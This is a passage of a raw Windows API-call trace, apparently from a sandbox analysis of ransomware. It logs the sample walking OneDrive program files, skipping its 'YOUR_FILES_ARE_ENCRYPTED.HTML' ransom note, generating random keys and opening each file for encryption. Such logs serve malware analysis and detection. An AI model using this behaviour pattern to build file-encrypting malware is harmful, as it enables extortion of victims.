(lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.875] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=20063) returned 1 [0112.875] GetProcessHeap () returned 0x600000 [0112.875] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0112.877] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3B") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="C6") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="4D") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="9F") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C9") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="08") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="A1") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="10") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="54") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D1") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="77") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="1D") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FC") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="3C") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C7") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A5") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="C2") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="CA") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EF") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="01") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="07") returned 2 [0112.877] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="CF") returned 2 [0112.877] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="35") returned 2 [0112.877] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="90") returned 2 [0112.878] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="0C") returned 2 [0112.878] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="0E") returned 2 [0112.878] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="28") returned 2 [0112.878] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="C0") returned 2 [0112.878] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="4A") returned 2 [0112.878] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A3") returned 2 [0112.878] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="3D") returned 2 [0112.878] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0A") returned 2 [0112.878] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml" [0112.878] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.878] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0112.878] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x501ed543, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x501ed543, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50390d5d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0112.878] StrStrIW (lpFirst="FileSync.LocalizedResources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.878] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll") returned 107 [0112.879] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0112.879] lstrlenW (lpString=".dll") returned 4 [0112.879] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0112.879] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0112.880] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=82112) returned 1 [0112.880] GetProcessHeap () returned 0x600000 [0112.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0112.883] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="D7") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="3E") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DA") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="3C") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="10") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="1D") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C5") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="11") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="36") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FB") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A2") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="8B") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="42") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="07") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="8F") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="E6") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="41") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="6A") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A5") returned 2 [0112.883] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="41") returned 2 [0112.884] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="54") returned 2 [0112.884] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="66") returned 2 [0112.884] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="9E") returned 2 [0112.884] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="22") returned 2 [0112.884] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A4") returned 2 [0112.884] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A8") returned 2 [0112.884] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="50") returned 2 [0112.884] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B7") returned 2 [0112.884] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="76") returned 2 [0112.884] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="1F") returned 2 [0112.884] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="F5") returned 2 [0112.884] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0A") returned 2 [0112.884] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.LocalizedResources.dll" [0112.884] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.884] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0112.884] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390d5d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50390d5d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x505a6c82, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x28d8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0112.885] StrStrIW (lpFirst="FileSync.Resources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.885] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll") returned 98 [0112.885] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0112.885] lstrlenW (lpString=".dll") returned 4 [0112.885] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0112.885] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0112.887] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=2676928) returned 1 [0112.887] GetProcessHeap () returned 0x600000 [0112.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0112.889] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="D3") returned 2 [0112.889] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7B") returned 2 [0112.889] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="76") returned 2 [0112.889] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="0F") returned 2 [0112.889] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="DA") returned 2 [0112.889] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="2D") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="91") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="E9") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="BE") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="CC") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D1") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="CC") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="56") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="95") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="BF") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="B0") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="6C") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="AF") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="10") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B4") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="3B") returned 2 [0112.890] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="17") returned 2 [0112.890] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A1") returned 2 [0112.890] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="86") returned 2 [0112.890] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B6") returned 2 [0112.890] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BC") returned 2 [0112.890] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="61") returned 2 [0112.890] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="73") returned 2 [0112.890] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="96") returned 2 [0112.890] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E1") returned 2 [0112.890] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="2D") returned 2 [0112.890] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="56") returned 2 [0112.891] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSync.Resources.dll" [0112.891] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.891] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0112.891] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505f317e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x505f317e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5082f572, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x362c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncApi.dll", cAlternateFileName="FILESY~3.DLL")) returned 1 [0112.891] StrStrIW (lpFirst="FileSyncApi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.891] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll") returned 91 [0112.891] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0112.891] lstrlenW (lpString=".dll") returned 4 [0112.891] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0112.891] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\filesyncapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.897] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=221888) returned 1 [0112.897] GetProcessHeap () returned 0x600000 [0112.897] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.899] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="35") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="4F") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="08") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="51") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CE") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="84") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="29") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="86") returned 2 [0112.899] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="0B") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="7B") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="19") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="78") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="76") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="50") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="8B") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7F") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="FB") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="6C") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F8") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="BD") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="99") returned 2 [0112.900] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="77") returned 2 [0112.900] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="06") returned 2 [0112.900] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="EC") returned 2 [0112.900] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F3") returned 2 [0112.900] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E7") returned 2 [0112.900] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="F2") returned 2 [0112.900] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="FE") returned 2 [0112.900] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="EF") returned 2 [0112.900] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="17") returned 2 [0112.900] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="0C") returned 2 [0112.900] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="31") returned 2 [0112.901] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncApi.dll" [0112.901] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.901] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.901] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50855780, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50855780, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50914269, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1d9ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncClient.dll", cAlternateFileName="FILESY~4.DLL")) returned 1 [0112.901] StrStrIW (lpFirst="FileSyncClient.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.901] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll") returned 94 [0112.901] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0112.901] lstrlenW (lpString=".dll") returned 4 [0112.901] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0112.901] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\filesyncclient.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0112.902] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1941184) returned 1 [0112.902] GetProcessHeap () returned 0x600000 [0112.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.904] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="B5") returned 2 [0112.904] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="BE") returned 2 [0112.904] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="AC") returned 2 [0112.904] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="9E") returned 2 [0112.904] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E8") returned 2 [0112.904] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="2F") returned 2 [0112.904] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="80") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="29") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="65") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="81") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="AF") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="85") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="B7") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="B1") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="89") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="F0") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="86") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="6E") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="FF") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="C2") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="69") returned 2 [0112.905] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="95") returned 2 [0112.905] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="16") returned 2 [0112.905] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="ED") returned 2 [0112.906] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="8C") returned 2 [0112.906] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E6") returned 2 [0112.906] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="56") returned 2 [0112.906] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="28") returned 2 [0112.906] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="74") returned 2 [0112.906] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="1B") returned 2 [0112.906] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="17") returned 2 [0112.906] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="4D") returned 2 [0112.906] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncClient.dll" [0112.906] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.906] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.906] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | 